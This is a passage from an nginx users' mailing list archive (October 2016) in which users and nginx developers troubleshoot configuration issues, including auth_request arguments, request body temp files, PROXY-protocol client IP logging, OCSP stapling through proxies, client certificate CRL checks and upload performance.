From nginx-forum at forum.nginx.org Wed Oct 12 11:09:22 2016 From: nginx-forum at forum.nginx.org (netcana) Date: Wed, 12 Oct 2016 07:09:22 -0400 Subject: Practical size limit of config files In-Reply-To: References: Message-ID: <7bf878c21818ae77b8d586b187f34798.NginxMailingListEnglish@forum.nginx.org> Same question here, but I think no one knows - that's why there is no reply.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270109,270197#msg-270197

From nginx-forum at forum.nginx.org Wed Oct 12 11:11:57 2016 From: nginx-forum at forum.nginx.org (netcana) Date: Wed, 12 Oct 2016 07:11:57 -0400 Subject: URL is not pointing to https on iframe In-Reply-To: References: Message-ID: <900484913fd476e79073886182b0898c.NginxMailingListEnglish@forum.nginx.org> Wish you all the best for your project, but sorry, I have no clue about your question. Thanks.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270042,270198#msg-270198

From mdounin at mdounin.ru Wed Oct 12 13:52:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 12 Oct 2016 16:52:14 +0300 Subject: [nginx-announce] nginx-1.11.5 In-Reply-To: References: <20161011153240.GD73038@mdounin.ru> Message-ID: <20161012135214.GG73038@mdounin.ru> Hello!

On Wed, Oct 12, 2016 at 03:03:29PM +0530, Anoop Alias wrote:

> *) Feature: the --with-compat configure option.
>
> What does this do actually?

This option enables dynamic modules compatibility; that is, it ensures that the appropriate fields in structures are present (or appropriately-sized placeholders are added). As a result, it is now possible to compile compatible dynamic modules using a minimal set of configure arguments, as long as the main nginx binary is compiled using --with-compat. Just

./configure --with-compat --add-dynamic-module=/path/to/module

should be enough to compile a binary-compatible module. Additionally, this option enables binary compatibility of dynamic modules with our commercial product, NGINX Plus, and thus allows one to compile and load custom modules into NGINX Plus. The corresponding version of NGINX Plus is yet to be released though.
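For completeness, a module built that way is then loaded with load_module at the top of nginx.conf; the module name below is hypothetical:

load_module modules/ngx_http_example_module.so;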
-- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Oct 12 14:02:10 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 12 Oct 2016 17:02:10 +0300 Subject: newbie question In-Reply-To: References: Message-ID: <20161012140210.GH73038@mdounin.ru> Hello! On Wed, Oct 12, 2016 at 12:43:12PM +1100, Alex Samad wrote: > Hi > > I am trying to create a dynamic auth address > > > # grab ssoid > map $cookie_SSOID $ssoid_cookie { > default ""; > ~SSOID=(?P.+) $ssoid; > } > > > location /imaadmin/ { > proxy_cache off; > proxy_pass http://IMAAdmin; > > > > auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; > > > what I am trying to do is fill the variable ssoid_cookie with the > cookie value for SSOID in the request or make it blank > > then when somebody tries to access /imaadmin make the auth request > /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; > > but i get this > GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 This is because the "auth_request" directive doesn't support variables, and also doesn't support request arguments. Try this instead: location /imaadmin/ { auth_request /sso/validate; ... proxy_pass ... } location = /sso/validate { set $args SSOID=$ssoid_cookie&a=imaadmin; ... proxy_pass ... } -- Maxim Dounin http://nginx.org/ From akshayaamohan05 at gmail.com Wed Oct 12 15:22:15 2016 From: akshayaamohan05 at gmail.com (AKSHAYAA MOHAN) Date: Wed, 12 Oct 2016 20:52:15 +0530 Subject: Log response location headers when Nginx is used as reverse proxy Message-ID: Hi, I have a usecase where I want to log the response location headers returned by the upstream servers. Is there a way I can do this without installing any third party tools? Regards -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Oct 12 16:03:02 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 12 Oct 2016 17:03:02 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> References: <20161010161622.GB11677@daoine.org> <216fd4b10237c6458f868f35d5a7f2ac.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161012160302.GD11677@daoine.org> On Wed, Oct 12, 2016 at 06:28:47AM -0400, yurai wrote: Hi there, > >"The file should be transferred to the nginx server." > > This is the whole point. > With current configuration when I type curl --data-binary '@upload.txt' > http://localhost/upload file is NOT transffered from client to server at all > - "proxy_pass" is performed and I only get HTTP response 200. There is the client. There is the nginx server, that the client talks to. There is the upstream back-end server, that nginx talks to. Are you reporting that the content of the client-file upload.txt is not saved on the nginx server that is localhost, in a numbered file below your client_body_temp_path? Or are you reporting that the content of the client-file upload.txt is not transferred to the upstream back-end server? There is more than one server involved. Please be very clear which one you are referring to, when you refer to any. > When I change my configuration (by removing whole backend configuration (s2 > block) and all proxy_* directives from s1) and type same command I get HTTP > 405 Not Allowed or HTTP 301 Moved Permanently. > > Let's ignore for the second size of my file in body. Maybe in this moment > the right question is: what should I do to make my above curl command work? It works for me. 
Perhaps I have a different idea of what "works" means.

f -- Francis Daly francis at daoine.org

From thomas at glanzmann.de Wed Oct 12 17:50:06 2016 From: thomas at glanzmann.de (Thomas Glanzmann) Date: Wed, 12 Oct 2016 19:50:06 +0200 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests Message-ID: <20161012175006.GD5983@glanzmann.de> Hello, I would like to use ngx_stream_ssl_preread_module to multiplex a web server, openvpn, and squid onto one IP address and port. However, I would also like to keep the real client IP address in my http logs. Is that possible, and if so, how? Cheers, Thomas

From arut at nginx.com Wed Oct 12 18:06:58 2016 From: arut at nginx.com (Roman Arutyunyan) Date: Wed, 12 Oct 2016 21:06:58 +0300 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests In-Reply-To: <20161012175006.GD5983@glanzmann.de> References: <20161012175006.GD5983@glanzmann.de> Message-ID: <20161012180658.GD52217@Romans-MacBook-Air.local> Hi Thomas, On Wed, Oct 12, 2016 at 07:50:06PM +0200, Thomas Glanzmann wrote: > Hello, > I would like to use ngx_stream_ssl_preread_module to multiplex a web > server, openvpn, and squid to one ip address and port. However I would > also like to keep the real client ip address in my http logs, is that > possible, if so how? You can enable the PROXY protocol for upstream connections. But your backends must support it. http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_protocol -- Roman Arutyunyan

From thomas at glanzmann.de Wed Oct 12 18:33:29 2016 From: thomas at glanzmann.de (Thomas Glanzmann) Date: Wed, 12 Oct 2016 20:33:29 +0200 Subject: Use ngx_stream_ssl_preread_module but also log client ip in access.log for https requests In-Reply-To: <20161012180658.GD52217@Romans-MacBook-Air.local> References: <20161012175006.GD5983@glanzmann.de> <20161012180658.GD52217@Romans-MacBook-Air.local> Message-ID: <20161012183329.GB12201@glanzmann.de> Hello Roman, * Roman Arutyunyan [2016-10-12 20:07]: > On Wed, Oct 12, 2016 at 07:50:06PM +0200, Thomas Glanzmann wrote: > > I would like to use ngx_stream_ssl_preread_module to multiplex a web > > server, openvpn, and squid to one ip address and port. However I would > > also like to keep the real client ip address in my http logs, is that > > possible, if so how? > You can enable the PROXY protocol for upstream connections. > But your backends must support it. > http://nginx.org/en/docs/stream/ngx_stream_proxy_module.html#proxy_protocol thanks a lot for the hint. It works like a charm. For others who want to do the same, I did the following:

- configured nginx with --with-stream --with-stream_ssl_preread_module

- For https, listened on stream:

stream {
    proxy_protocol on;

    upstream webserver {
        server 127.0.0.1:443;
    }

    map $ssl_preread_server_name $name {
        default webserver;
    }

    server {
        listen :443;
        proxy_pass $name;
        ssl_preread on;
    }
}

- In my http context, I added:

set_real_ip_from 127.0.0.1;
real_ip_header proxy_protocol;

- And in my https listen directives I put:

listen 127.0.0.1:443 ssl http2 proxy_protocol;

I didn't even have to modify the access_log log format because apparently 'real_ip_header proxy_protocol' takes care of that.
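If one did want the original address in the log explicitly, rather than via the realip substitution, it is also exposed as $proxy_protocol_addr, so a log format along these lines (the format name is arbitrary) would also work:

log_format proxied '$proxy_protocol_addr - $remote_user [$time_local] "$request" $status';
access_log /var/log/nginx/access.log proxied;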
Cheers, Thomas

From nginx-forum at forum.nginx.org Wed Oct 12 19:34:45 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Wed, 12 Oct 2016 15:34:45 -0400 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <20161012160302.GD11677@daoine.org> References: <20161012160302.GD11677@daoine.org> Message-ID: <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> Hi, >Are you reporting that the content of the client-file upload.txt is not >saved on the nginx server that is localhost, in a numbered file below >your client_body_temp_path? Yes. Exactly this. My /tmp/nginx-client-body directory is empty. >There is more than one server involved. Please be very clear which one >you are referring to, when you refer to any. Please notice that in many places I try to be as precise as possible by referring to s1 and s2. Sorry for the confusion. By writing "server" I mean s1. By writing "backend" I mean s2. Both server names come from the configuration file I posted at the beginning of the discussion. Regards, Dawid

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270063,270222#msg-270222

From nginx-forum at forum.nginx.org Wed Oct 12 19:44:39 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Wed, 12 Oct 2016 15:44:39 -0400 Subject: URL is not pointing to https on iframe In-Reply-To: References: Message-ID: <52c40d5e12a504e8e0fb9a570061fb8f.NginxMailingListEnglish@forum.nginx.org> geopcgeo Wrote: ------------------------------------------------------- > fine on https. But please let me know whats the issue? Is it on Iframe > or > on Nginx. Can anyone please help us? This needs to be fixed in the iframe (or whatever you use to generate this iframe).

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270042,270224#msg-270224

From francis at daoine.org Wed Oct 12 21:44:43 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 12 Oct 2016 22:44:43 +0100 Subject: Clientbodyinfileonly - POST request is discarded In-Reply-To: <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> References: <20161012160302.GD11677@daoine.org> <4483dc9306924ed387ae3c4183e1cc23.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161012214443.GE11677@daoine.org> On Wed, Oct 12, 2016 at 03:34:45PM -0400, yurai wrote: Hi there, > >Are you reporting that the content of the client-file upload.txt is not > >saved on the nginx server that is localhost, in a numbered file below > >your client_body_temp_path? > > Yes. Exactly this. My /tmp/nginx-client-body directory is empty. Ok, that is unexpected to me. I've read back over the mail thread, and there seem to be a few things where it is not clear to me what exactly is happening. Can you make a test nginx.conf that is very simple, in an attempt to isolate where things are going wrong? I use this:

==
events {}
http {
    server {
        listen 8008;
        location = /upload {
            client_body_temp_path /tmp/clientb;
            client_body_in_file_only on;
            proxy_set_header X-FILE $request_body_file;
            proxy_pass http://127.0.0.1:8008/upstream;
        }
        location = /upstream {
            return 200 "Look in $http_x_file\n";
        }
    }
}
==

and when I do

curl -v --data-binary words http://127.0.0.1:8008/upload

I see the POST with Content-Length: 5; I get a response of "Look in " and a filename, and when I "ls -l" that filename I see that it is 5 bytes long. I use /tmp/clientb as the client directory above; that directory did not exist before I reloaded nginx, so nginx will create it with suitable permissions.
When I then do curl -v --data-binary @upload.txt http://127.0.0.1:8008/upload I see the POST with Content-Length: 16; I get a response of "Look in " and a different filename, and when I "cat" that filename I see the same 16-byte content as was in my original local upload.txt file. When you do exactly that, do you see anything different? Note that this is *not* exactly the same as your original case, because it leaves out many of the config directives. In particular, this *does* send the initial POST content to the upstream. That's ok; the point of this is to find out why and where the initial set-up is broken. Other bits can be added afterwards. > >There is more than one server involved. Please be very clear which one > >you are referring to, when you refer to any. > > Please notice that in many places I try to be precised as much as possible > by reffering to s1 and s2. Sorry for confusion. Actually, I'm wrong there, sorry about that. I had got confused with a separate mail; your mails were clear about the two server blocks on the one nginx on localhost. Thanks, f -- Francis Daly francis at daoine.org From alex at samad.com.au Thu Oct 13 04:53:37 2016 From: alex at samad.com.au (Alex Samad) Date: Thu, 13 Oct 2016 15:53:37 +1100 Subject: newbie question In-Reply-To: <20161012140210.GH73038@mdounin.ru> References: <20161012140210.GH73038@mdounin.ru> Message-ID: Hi Thanks I ended up with this but still with issues map $cookie_SSOID $ssoid_cookie { default ""; ~SSOID=(?P.+) $ssoid; } location /imaadmin/ { proxy_cache off; proxy_pass http://IMAAdmin; auth_request /sso/validate; # must use %20 for url encoding set $sso_group "Staff-sso"; proxy_pass error_page 401 = @error401; location @error401 { # return 302 https://$server_name/sso/login; rewrite ^ https://$server_name/sso/login; } location /sso/validate { proxy_cache off; rewrite (.*) $1?SSOID=$cookie_ssoid&a=$sso_group? break; proxy_set_header X-Original-URI $request_uri; proxy_pass location /sso/ { proxy_cache off; rewrite (.*) $1 break; proxy_set_header X-Original-URI $request_uri; proxy_set_header X-Original-URI "imaadmin"; # have to hard code proxy_pass So http://abc.com.au/imaadmin does a http://abc.com.au/sso/validate?SSOID=&a= 200 = okay 401 redirect to http://abc.com.au/sso/login sso redirects to http://abc.com.au/sso/login/form/[X-Original-URI] <<< its failing here I am hard coding this Thanks On 13 October 2016 at 01:02, Maxim Dounin wrote: > Hello! > > On Wed, Oct 12, 2016 at 12:43:12PM +1100, Alex Samad wrote: > >> Hi >> >> I am trying to create a dynamic auth address >> >> >> # grab ssoid >> map $cookie_SSOID $ssoid_cookie { >> default ""; >> ~SSOID=(?P.+) $ssoid; >> } >> >> >> location /imaadmin/ { >> proxy_cache off; >> proxy_pass http://IMAAdmin; >> >> >> >> auth_request /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; >> >> >> what I am trying to do is fill the variable ssoid_cookie with the >> cookie value for SSOID in the request or make it blank >> >> then when somebody tries to access /imaadmin make the auth request >> /sso/validate?SSOID=$ssoid_cookie&a=imaadmin; >> >> but i get this >> GET /sso/validate%3FSSOID=$ssoid_cookie&a=imaadmin HTTP/1.0 > > This is because the "auth_request" directive doesn't support > variables, and also doesn't support request arguments. > > Try this instead: > > location /imaadmin/ { > auth_request /sso/validate; > ... proxy_pass ... > } > > location = /sso/validate { > set $args SSOID=$ssoid_cookie&a=imaadmin; > ... proxy_pass ... 
> } > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx

From zeal at freecharge.com Thu Oct 13 09:37:25 2016 From: zeal at freecharge.com (Zeal Vora) Date: Thu, 13 Oct 2016 15:07:25 +0530 Subject: NGINX not checking OCSP for revoked certificates Message-ID: Hi, we've implemented basic Certificate Based Authentication for Nginx. However, whenever the certificate is revoked, Nginx still allows the client ( with the revoked certificate ) to access the website. I verified manually with openssl with the OCSP URI and OCSP seems to be working properly. Nginx doesn't seem to be forwarding a request to OCSP before allowing the client. I tried to specify the ssl_crl but as soon as I put it, all the clients start to receive 400 Bad Request. Here is my sample relevant Nginx Config:

### SSL cert files ###
ssl_client_certificate /test/ca.crt;
ssl_verify_client optional;

ssl_crl /prod-adcs/latest.pem;
ssl_verify_depth 2;

Is there something that I'm missing here? Any help will be appreciated. -------------- next part -------------- An HTML attachment was scrubbed... URL:

From nginx-forum at forum.nginx.org Thu Oct 13 09:40:21 2016 From: nginx-forum at forum.nginx.org (lancee83) Date: Thu, 13 Oct 2016 05:40:21 -0400 Subject: Multiple proxy_cache_path location Message-ID: Hi All I'm using nginx with Unified Streaming - I would like to have different cache settings per channel. Is it possible to state different proxy_cache_path parameters? Thanks in advance

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270240,270240#msg-270240

From rainer at ultra-secure.de Thu Oct 13 10:25:44 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 12:25:44 +0200 Subject: ocsp-stapling through http proxy? Message-ID: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Hi, we have been informed by our CA that they will be moving their OCSP-servers to "the cloud" - it was a fixed set of IPs before. These fixed sets could relatively easily be entered as firewall rules (and hosts-file entries, should DNS-resolution be unavailable). Of course, they could as easily be targeted by Script-Kiddies and Wannabe-Hackers as targets for a DDoS. As such, I would need to allow outbound http-connections to the whole internet, which is kind of exactly the opposite of what I want to do. And that's ignoring for a moment the necessity to allow outbound DNS... It would be cool if nginx would be able to do the stapling through a http-proxy. Rainer

From r at roze.lv Thu Oct 13 11:16:42 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 14:16:42 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Message-ID: <005c01d22543$46a3eb70$d3ebc250$@roze.lv> > It would be cool if nginx would be able to do the stapling through a http- > proxy. Technically you could just "override" (via /etc/hosts or if you have your own DNS service) your SSL provider's OCSP IP to point to your own proxy, which will then forward the requests to the original server. p.s. in this case though probably a simple http proxy won't do, but tcp should work rr

From rainer at ultra-secure.de Thu Oct 13 12:22:58 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 14:22:58 +0200 Subject: ocsp-stapling through http proxy?
In-Reply-To: <005c01d22543$46a3eb70$d3ebc250$@roze.lv> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> Message-ID: <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> On 2016-10-13 13:16, Reinis Rozitis wrote: >> It would be cool if nginx would be able to do the stapling through a >> http- >> proxy. > > Technically you could just "override" (via /etc/hosts or if you have > your own dns service) your ssl's provider ocsp ip to your own proxy > which will forward then the requests to the original server. You mean a transparent proxy? In our case, this is not possible.

From mdounin at mdounin.ru Thu Oct 13 12:57:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 13 Oct 2016 15:57:32 +0300 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: Message-ID: <20161013125732.GR73038@mdounin.ru> Hello!

On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > Hi > > We've implemented basic Certificate Based Authentication for Nginx. > > However whenever the certificate is revoked, Nginx still allows the client > ( with revoked certificate ) to access the website. > > I verified manually with openssl with OCSP URI and OCSP seems to be working > properly. Nginx doesn't seem to be forwarding request to OCSP before > allowing client. That's because nginx doesn't support OCSP validation of client certificates. Use CRLs instead. > I tried to specify the ssl_crl but as soon as I put it, all the clients > starts to receive 400 Bad Request. > > Here is my sample relevant Nginx Config :- > > > ### SSL cert files ### > > ssl_client_certificate /test/ca.crt; > ssl_verify_client optional; > > ssl_crl /prod-adcs/latest.pem; > ssl_verify_depth 2; > > > Is there something that I'm missing here ? Your error log should have details. Given you are using verify depth set to 2, most likely there is no CRL for the root certificate itself, and that's why nginx is complaining. -- Maxim Dounin http://nginx.org/

From mdounin at mdounin.ru Thu Oct 13 13:34:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 13 Oct 2016 16:34:14 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> Message-ID: <20161013133414.GT73038@mdounin.ru> Hello!

On Thu, Oct 13, 2016 at 12:25:44PM +0200, rainer at ultra-secure.de wrote: > Hi, > > we have been informed by our CA that they will be moving their OCSP-servers > to "the cloud" - it was a fixed set of IPs before. > These fixed sets could relatively easily be entered as firewall rules (and > hosts-file entries, should DNS-resolution be unavailable). > Of course, they could as easily be targeted by Script-Kiddies and > Wannabe-Hackers as targets for a DDoS. > > As such, I would need to allow outbound http-connections to the whole > internet, which is kind of exactly the opposite of what I want to do. > And that's ignoring for a moment the necessity to allow outbound DNS... > > It would be cool if nginx would be able to do the stapling through a > http-proxy.

OCSP stapling allows you to:

- provide your own file to staple using the ssl_stapling_file directive. It doesn't matter for nginx how the file was obtained. You can even update it by hand. It might be relatively straightforward to configure an automatic updating process though. See http://nginx.org/r/ssl_stapling_file for details.

- use an explicitly configured OCSP responder with the ssl_stapling_responder directive.
It allows you to configure your own OCSP responder at a fixed address, and then proxy requests to the real responder. See http://nginx.org/r/ssl_stapling_responder for details. -- Maxim Dounin http://nginx.org/

From r at roze.lv Thu Oct 13 14:13:20 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 17:13:20 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> Message-ID: > You mean a transparent proxy? > In our case, this is not possible. It's not really transparent. As far as I understand, you have a problem with opening outgoing traffic to _random_ destinations, but you are fine if such traffic is pushed through some proxy server (which in general means that the proxy server will in any case have outgoing access to "everywhere"). So while there is no http proxy support for such things in nginx (in Apache, as a workaround, you can override the responder's url https://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslstaplingforceurl ), what you could do is just force the OCSP responder's host to resolve to your proxy (no other traffic has to be altered), which then forwards the request to the original responder. The proxy could as well be another nginx instance (the problem is just that nginx (besides the commercial nginx+) doesn't resolve (without some workarounds) backend hostnames on the fly, but only on startup). But in the end, do you really need it? Even in the "cloud" the IPs shouldn't change too often (if so, maybe it's worth looking for another SSL provider?); also, there is no failure if suddenly the stapling doesn't happen server-side. Just monitor it, and when the resolution changes (or nginx starts to complain), alter your firewall rules. p.s. I haven't done the "proxy part", but at one time there were problems with GoDaddy's European OCSP responders, so I did the DNS thingy and forced ocsp.godaddy.com to be resolved to US IPs and it worked fine. rr

From r at roze.lv Thu Oct 13 14:15:36 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 17:15:36 +0300 Subject: ocsp-stapling through http proxy? In-Reply-To: <20161013133414.GT73038@mdounin.ru> References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <20161013133414.GT73038@mdounin.ru> Message-ID: >- use an explicitly configured OCSP responder with the > ssl_stapling_responder directive. It allows to configure your > own OCSP responder at a fixed address, and then proxy requests to > the real responder. See http://nginx.org/r/ssl_stapling_responder > for details. Ohh, I totally overlooked this setting .. available since 1.3.7, too. Apparently I need to reread the documentation more often. rr

From rainer at ultra-secure.de Thu Oct 13 14:45:01 2016 From: rainer at ultra-secure.de (rainer at ultra-secure.de) Date: Thu, 13 Oct 2016 16:45:01 +0200 Subject: ocsp-stapling through http proxy? In-Reply-To: References: <84bf5c3064ee4f7a80175857ddda136d@ultra-secure.de> <005c01d22543$46a3eb70$d3ebc250$@roze.lv> <2bec12a28a9c26fa84ae590ecc39a0cb@ultra-secure.de> Message-ID: <9c1c11949268d7f2b2d0a44b1bc6381f@ultra-secure.de> On 2016-10-13 16:13, Reinis Rozitis wrote: >> You mean a transparent proxy? >> In our case, this is not possible. > > It's not really transparent.
> > As far as I understand you have a problem with opening outgoing > traffic to _random_ destination but you are fine if such traffic is > pushed through some proxy server (which in general means that the > proxy server will anyways have outgoing to "everywhere"). Yes, but the OCSP URL is known and doesn't change. And the proxy has a very limited set of URLs it can access. As such, this is much better than opening up "*". > So while there is no http proxy support for such things in nginx ( in > Apache as a workarround you can override the responders url > https://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslstaplingforceurl > ) what you could do is just force the ocsp responders host to resolve > to your proxy (no other traffic has to be altered) which then forwards > the request to the original responder. I will have to try this. > The proxy could be aswell another nginx instance (the problem is just > that nginx (besides the commercial nginx+) doesn't resolve (without > some workarrounds) backend hostnames on the fly but only on startup). > > > > But in the end do you really need it? > > Even in the "cloud" the IPs shouldn't change too often (if so maybe > it's worth to look for another SSL provider?) also there is no failure > if suddenly the stapling doesn't happen serverside, just monitor it > and when the resolution changes (or nginx starts to complain) alter > your firewall rules. I have a lot of these proxies. Also TTLs on these records are notoriously short and I have no idea what scheme our CA has chosen for running these boxes. As I know a bit about the CA software they use, my guess would also be that these servers are going to be relatively stable. Changing to a different CA is not an option, either - and not my call anyway... > p.s. I haven't done the "proxy part" but at one time there were > problems with Godaddys European ocsp responders so I did the DNS > thingy and forced the ocsp.godaddy.com to be resolved to US ips and it > worked fine. I generally try to avoid hosts-file entries. They are a source of hassle and confusion. The only exception is when you need to point a server to itself and the public IP the name resolves to is different (because: NAT) than the IP the server is running on. Then I do create 127.0.0.1 entries in the hosts-file. Thanks for your input. Rainer From shahzaib.cb at gmail.com Thu Oct 13 17:39:18 2016 From: shahzaib.cb at gmail.com (shahzaib mushtaq) Date: Thu, 13 Oct 2016 22:39:18 +0500 Subject: Slow uploading speed !! Message-ID: Hi, We're facing quite slow uploading speed on FreeBSD-10.X over HTTP (NGINX). Hardware is quite strong with 4x1Gbps LACP / 65G RAM / 12x3TB SATA . There's not much load on HDDs so i suspect that maybe tcp tuning has some problem. Here is my sysctl.conf http://pastebin.com/MqNbD3VR Here is /boot/loader.conf : http://pastebin.com/WrW3ceVF I'd also like to inform that -tso is disabled on all interfaces. Regarding upload mechanism : - client uploads the video with HTTP POST request on a file name uploader.php - uploading starts Is there some NGINX variables which we can tweak for POST request ? Currently the relevant one looks to be fastcgi_buffers . Here is nginx.conf : http://pastebin.com/ek7TCJha Thanks in advance !! Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Thu Oct 13 19:44:18 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 13 Oct 2016 22:44:18 +0300 Subject: Slow uploading speed !! 
In-Reply-To: References: Message-ID: <00fd01d2258a$30114b40$9033e1c0$@roze.lv> > We're facing quite slow uploading speed on FreeBSD-10.X over HTTP (NGINX). How slow is "slow"? As in you didn't provide any metrics. > There's not much load on HDDs so i suspect that maybe tcp tuning has some problem. Well you could simply transfer a file via scp (-c arcfour) or netcat to see if the bottleneck is network/tcp. > Is there some NGINX variables which we can tweak for POST request ? Currently the relevant one looks to be fastcgi_buffers . Here is nginx.conf : > http://pastebin.com/ek7TCJha Fastcgi_buffers don't affect upload bandwidth. But client_body_buffer_size 4096M; seems a bit extreme to me since even with 65G ram you would be able to have only ~16 simultaneous uploads (if all upload ~4G the same time) - a quite possible dos factor. rr From zeal at freecharge.com Fri Oct 14 05:49:27 2016 From: zeal at freecharge.com (Zeal Vora) Date: Fri, 14 Oct 2016 11:19:27 +0530 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: <20161013125732.GR73038@mdounin.ru> References: <20161013125732.GR73038@mdounin.ru> Message-ID: Thanks Maxim. I tried changing the ssl_verify_depth to 1 from value of 2 however still I get 400 Bad Request for all the certificates ( Valid and Revoked ). I checked the error_log file, there are no entries in that file. It all works when I remove the ssl_crl option ( however then revoked certificates are allowed ). Just for bit more info, I downloaded the CRL from ADCS which is in form of test.crl which I convert it to .pem format with openssl. On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin wrote: > Hello! > > On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > > > Hi > > > > We've implemented basic Certificate Based Authentication for Nginx. > > > > However whenever the certificate is revoked, Nginx still allows the > client > > ( with revoked certificate ) to access the website. > > > > I verified manually with openssl with OCSP URI and OCSP seems to be > working > > properly. Nginx doesn't seem to be forwarding request to OCSP before > > allowing client. > > That's because nginx doesn't support OCSP validation of client > certificates. Use CRLs instead. > > > I tried to specify the ssl_crl but as soon as I put it, all the clients > > starts to receive 400 Bad Request. > > > > Here is my sample relevant Nginx Config :- > > > > > > ### SSL cert files ### > > > > ssl_client_certificate /test/ca.crt; > > ssl_verify_client optional; > > > > ssl_crl /prod-adcs/latest.pem; > > ssl_verify_depth 2; > > > > > > Is there something that I'm missing here ? > > Your error log should have details. Given you are using verify > depth set to 2, most likely there is no CRL for the root > certificate itself, and that's why nginx complaining. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From alex at samad.com.au Fri Oct 14 08:50:35 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 14 Oct 2016 19:50:35 +1100 Subject: NGINX not checking OCSP for revoked certificates In-Reply-To: References: <20161013125732.GR73038@mdounin.ru> Message-ID: What I had to do was sent the depth to the number or greater than the number of ca's and I had to get all the crl's for each CA and concat into a crl file. On 14 October 2016 at 16:49, Zeal Vora wrote: > Thanks Maxim. 
> > I tried changing the ssl_verify_depth to 1 from value of 2 however still I > get 400 Bad Request for all the certificates ( Valid and Revoked ). > > I checked the error_log file, there are no entries in that file. It all > works when I remove the ssl_crl option ( however then revoked certificates > are allowed ). > > Just for bit more info, I downloaded the CRL from ADCS which is in form of > test.crl which I convert it to .pem format with openssl. > > > > > On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin wrote: >> >> Hello! >> >> On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: >> >> > Hi >> > >> > We've implemented basic Certificate Based Authentication for Nginx. >> > >> > However whenever the certificate is revoked, Nginx still allows the >> > client >> > ( with revoked certificate ) to access the website. >> > >> > I verified manually with openssl with OCSP URI and OCSP seems to be >> > working >> > properly. Nginx doesn't seem to be forwarding request to OCSP before >> > allowing client. >> >> That's because nginx doesn't support OCSP validation of client >> certificates. Use CRLs instead. >> >> > I tried to specify the ssl_crl but as soon as I put it, all the clients >> > starts to receive 400 Bad Request. >> > >> > Here is my sample relevant Nginx Config :- >> > >> > >> > ### SSL cert files ### >> > >> > ssl_client_certificate /test/ca.crt; >> > ssl_verify_client optional; >> > >> > ssl_crl /prod-adcs/latest.pem; >> > ssl_verify_depth 2; >> > >> > >> > Is there something that I'm missing here ? >> >> Your error log should have details. Given you are using verify >> depth set to 2, most likely there is no CRL for the root >> certificate itself, and that's why nginx complaining. >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> 